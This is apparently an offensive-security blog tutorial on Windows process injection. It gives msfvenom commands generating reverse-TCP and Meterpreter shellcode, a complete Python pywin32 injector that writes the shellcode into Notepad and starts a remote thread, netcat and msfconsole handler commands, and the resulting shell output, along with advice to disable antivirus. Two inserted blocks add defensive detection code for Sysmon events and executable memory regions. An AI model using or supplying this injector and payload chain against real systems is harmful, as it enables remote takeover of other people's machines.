Hello all. I felt that I should share a much cooler method of injection which involves shellcode!
Shellcode is quite literally just raw bytes of code, not too different from the assembly that we’ve been working with off and on over the past few posts. It often creates a “shell” for an attacker, hence the name shellcode. Fortunately for us, we don’t have to write it all by hand this time. This is a much more fun version of injection as we can customize the shellcode through tools like Metasploit. We will be using Metasploit today, so you may want to get familiar with it. Don’t worry, the BowTied Jungle has plenty of material on it.
Secondly, we can also take a break from C++! Hallelujah. Today, instead, we will use Python and its pywin32 library to perform the injection. This should be super easy, so you should definitely follow along! Don’t forget to disable your AV. Your shellcode will probably trip it.
Methodology
Use Metasploit to generate shellcode for a reverse TCP shell.
Write a Python program that injects the shellcode into a running process.
Create a reverse TCP handler in Metasploit or netcat.
Run the injection and wait for the handler to activate.
Eject your target machine’s CD drive.
Requirements
A Windows machine
Metasploit
Python (with the pywin32 library)
Preferably WSL2 or a Linux VM
Metasploit
First, you need a listening IP address. This is your own IP address: it is the one the reverse shell will connect back to. You can find it with either ifconfig or ip addr.
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.19.66.222  netmask 255.255.240.0  broadcast 172.19.79.255
Grab the address of eth0 (or whatever your interface name is). Loopback (lo) also works. In my case, I just used 127.0.0.1. Note that if you’re doing this to another machine across networks, you will need your external IP, i.e. an address the target can actually reach.
Next, you need to generate your shellcode with Metasploit. This can be done in just 1 line 😱.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=8989 -f python
Obviously, replace LHOST with your IP address. Also, make sure the payload architecture (x64 here) matches that of the target process, or else it will crash.
-p is our payload.
LHOST is our listening IP address.
LPORT is our listening port; it can be pretty much anything.
-f is the output format of the payload (we’re using Python, duh).
You will get a spew of Python code to slap into a file. You can also redirect output (>) into a file for simplicity.
We’ll come back to Metasploit later if necessary. For now, we can move on to writing our code.
Python
If you don’t have pywin32 yet, just install it with pip3 install pywin32. You can also use ctypes if you’re cracked, but pywin32 is easiest.
Make sure you have your shellcode in your file (not pasting it here since it’s huge).
shellcode.py
import win32api
import win32con
import win32process
import win32com.client

def main():
    ### Giant spew of shellcode ###
    # The msfvenom -f python output goes here: it starts with this line and then
    # appends the raw bytes with buf += b"..." lines.
    buf = b""

    target = "Notepad.exe"
    # Look up the target's PID through WMI rather than walking the process list by hand.
    wmi = win32com.client.GetObject("winmgmts:")
    pids = wmi.ExecQuery(f"Select * from Win32_Process where Name = '{target}'")
    if not pids or not len(pids):
        print(f"Could not find process {target}")
        return
    # Open the target with every right, allocate a committed read/write/execute region
    # inside it, copy the shellcode in, and start a new thread at the region's base.
    proc = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, False, pids[0].ProcessId)
    mem = win32process.VirtualAllocEx(proc, 0, len(buf),
                                      win32con.MEM_COMMIT | win32con.MEM_RESERVE,
                                      win32con.PAGE_EXECUTE_READWRITE)
    win32process.WriteProcessMemory(proc, mem, buf)
    thread, threadid = win32process.CreateRemoteThread(proc, None, 0, mem, 0, 0)
    print(f"Injected with id {threadid}")
    win32api.CloseHandle(thread)
    win32api.CloseHandle(proc)

if __name__ == "__main__":
    main()
Yep, that’s it. A shellcode injector in 20 SLOC.
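From the blue-team side, the four calls above leave a very recognisable trail: Sysmon Event 10 (ProcessAccess) records the OpenProcess with GrantedAccess 0x1FFFFF, and Event 8 (CreateRemoteThread) records a thread whose start address maps to no loaded module. The following detection sketch is an added example, not part of the original post; it correlates the two over constructed, simplified Sysmon records (the process names, PIDs and addresses are made up), flagging only when the source obtained allocate, write and create-thread rights before starting a thread in unbacked memory.

```python
from collections import defaultdict

# Rights the injector above needs in the target, in the order it uses them:
PROCESS_VM_OPERATION = 0x8      # VirtualAllocEx
PROCESS_VM_WRITE = 0x20         # WriteProcessMemory
PROCESS_CREATE_THREAD = 0x2     # CreateRemoteThread
INJECT_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD
# PROCESS_ALL_ACCESS (0x1FFFFF), as requested above, obviously contains all three.

# Constructed, simplified Sysmon records using Sysmon's own field names.
SAMPLE_EVENTS = [
    # Event 10 (ProcessAccess): the injector opens notepad with PROCESS_ALL_ACCESS
    {"EventID": 10, "SourceProcessId": 4242, "SourceImage": r"C:\Python311\python.exe",
     "TargetProcessId": 1337, "TargetImage": r"C:\Windows\System32\notepad.exe",
     "GrantedAccess": "0x1FFFFF"},
    # Event 8 (CreateRemoteThread): the thread starts at an address no module is mapped at
    {"EventID": 8, "SourceProcessId": 4242, "SourceImage": r"C:\Python311\python.exe",
     "TargetProcessId": 1337, "TargetImage": r"C:\Windows\System32\notepad.exe",
     "StartAddress": "0x1F4A3C20000", "StartModule": "", "StartFunction": ""},
    # Benign: a process viewer reading memory, no write or thread rights
    {"EventID": 10, "SourceProcessId": 900, "SourceImage": r"C:\Tools\procexp64.exe",
     "TargetProcessId": 1337, "TargetImage": r"C:\Windows\System32\notepad.exe",
     "GrantedAccess": "0x1410"},
    # Benign: a remote thread whose start address resolves to a loaded module (kernel32!CtrlRoutine)
    {"EventID": 8, "SourceProcessId": 612, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetProcessId": 2048, "TargetImage": r"C:\Windows\System32\cmd.exe",
     "StartAddress": "0x7FF9A1C84560", "StartModule": r"C:\Windows\System32\kernel32.dll",
     "StartFunction": "CtrlRoutine"},
]

def has_inject_rights(access_bits):
    """True when the granted access includes allocate + write + create-thread."""
    return access_bits & INJECT_MASK == INJECT_MASK

def find_injections(events):
    """Correlate Event 10 and Event 8 per (source pid, target pid), in log order:
    flag a remote thread starting in unbacked memory (empty StartModule) once the
    source has obtained the three rights on that target."""
    granted = defaultdict(int)   # (src, tgt) -> union of GrantedAccess bits seen so far
    hits = []
    for ev in events:
        key = (ev["SourceProcessId"], ev["TargetProcessId"])
        if ev["EventID"] == 10:
            granted[key] |= int(ev["GrantedAccess"], 16)   # Sysmon logs it as a hex string
        elif ev["EventID"] == 8 and not ev.get("StartModule") and has_inject_rights(granted[key]):
            hits.append({"source": ev["SourceImage"], "target": ev["TargetImage"],
                         "target_pid": ev["TargetProcessId"], "start_address": ev["StartAddress"]})
    return hits
```

find_injections(SAMPLE_EVENTS) returns one hit, the python.exe → notepad.exe pair; the csrss thread is ignored because its start address lies inside kernel32.dll.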
Now we get to run it.
But first! We need to have a handler open. You can use either Metasploit, netcat, or any other TCP listener.
$ nc -lvvp 8989
Listening on LAPTOP-BOWTIEDC 8989
Now we can open Notepad.exe (or whatever our target process is) and run our shellcode injector.
$ nc -lvvp 8989
Listening on LAPTOP-BOWTIEDC 8989
Connection received on localhost 56810
Microsoft Windows [Version 10.0.22000.856]
(c) Microsoft Corporation. All rights reserved.

C:\Users\bowtiedcrawfish>
Hey look, a reverse shell. Now we can do pretty much whatever we want.
If we wanted to be even cooler, we could get a Meterpreter shell. We’ll have to remake our shellcode, but that’s easy.
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=8989 -f python > out.py
You should definitely redirect it. It’s HUGE. You could also forgo the -f switch and stick the raw output into a file to be read by your injector program. No hand-holding for that one :).
Slap all of that code into your file somehow. Then set up your Meterpreter handler (its payload setting has to match the payload you generated with msfvenom, or the session will never complete).
$ msfconsole -x "use multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 8989; exploit"
And then open notepad and run your injector.
[*] Started reverse TCP handler on 127.0.0.1:8989
[*] Sending stage (175174 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:8989 -> 127.0.0.1:56830 ) at 2022-09-02 10:46:16 -0500

meterpreter >
Now you have a Meterpreter shell! That was pretty easy, wasn’t it?
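Whether it is the plain shell or the Meterpreter stage, the code now runs from the committed, private, read/write/execute region the injector allocated, and that region is the memory-forensics artifact to hunt for. The classifier below is an added example, not the post's code: it applies the VirtualAllocEx flags used above to a constructed region table (addresses made up) and, on Windows, can walk a live process with VirtualQueryEx via ctypes.

```python
import ctypes

# Constants from the Windows SDK (win32con exposes the same names).
MEM_COMMIT, MEM_PRIVATE, MEM_IMAGE = 0x1000, 0x20000, 0x1000000
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80

def is_injected_looking(state, protect, region_type):
    """Committed + MEM_PRIVATE (VirtualAlloc'd, no file behind it) + writable-and-executable:
    exactly what VirtualAllocEx(MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) above creates.
    Loaded modules are MEM_IMAGE; JITs also use private RWX, so a hit is a lead to dump, not a verdict."""
    return (state == MEM_COMMIT and region_type == MEM_PRIVATE
            and (protect & 0xFF) in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY))  # & 0xFF drops PAGE_GUARD etc.

def scan(regions):
    """regions: iterable of (base, size, state, protect, type) as VirtualQueryEx reports them."""
    return [(b, s) for b, s, st, pr, ty in regions if is_injected_looking(st, pr, ty)]

# Constructed sample shaped like a region walk of an injected notepad.exe (addresses made up).
SAMPLE_REGIONS = [
    (0x7FF6A0000000, 0x1000, MEM_COMMIT, 0x02, MEM_IMAGE),    # PE header, PAGE_READONLY
    (0x7FF6A0001000, 0x3A000, MEM_COMMIT, 0x20, MEM_IMAGE),   # .text, PAGE_EXECUTE_READ
    (0x1F4A3C20000, 0x1000, MEM_COMMIT, 0x40, MEM_PRIVATE),   # the injector's RWX buffer
    (0x1F4A3C30000, 0x10000, MEM_COMMIT, 0x04, MEM_PRIVATE),  # ordinary heap, PAGE_READWRITE
]

class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [("BaseAddress", ctypes.c_void_p), ("AllocationBase", ctypes.c_void_p),
                ("AllocationProtect", ctypes.c_ulong), ("PartitionId", ctypes.c_ushort),
                ("RegionSize", ctypes.c_size_t), ("State", ctypes.c_ulong),
                ("Protect", ctypes.c_ulong), ("Type", ctypes.c_ulong)]

def walk_process(pid):
    """Windows only: yield (base, size, state, protect, type) for each region of a live PID."""
    k32 = ctypes.windll.kernel32
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    k32.VirtualQueryEx.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
                                   ctypes.POINTER(MEMORY_BASIC_INFORMATION), ctypes.c_size_t]
    k32.VirtualQueryEx.restype = ctypes.c_size_t
    h = k32.OpenProcess(0x400 | 0x10, False, pid)  # PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
    if not h:
        raise ctypes.WinError()
    mbi, addr = MEMORY_BASIC_INFORMATION(), 0
    while k32.VirtualQueryEx(h, addr, ctypes.byref(mbi), ctypes.sizeof(mbi)):
        yield (mbi.BaseAddress or 0, mbi.RegionSize, mbi.State, mbi.Protect, mbi.Type)
        addr = (mbi.BaseAddress or 0) + mbi.RegionSize
    k32.CloseHandle(h)
```

scan(SAMPLE_REGIONS) returns only the injector's buffer; on a Windows host, scan(walk_process(pid)) runs the same check against a live process.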
This should be obvious, but please don’t do anything illegal with what I’ve mentioned above. I am not responsible if you get caught. If you do get caught, I will make fun of you. Publicly.
Go!
-BowTiedCrawfish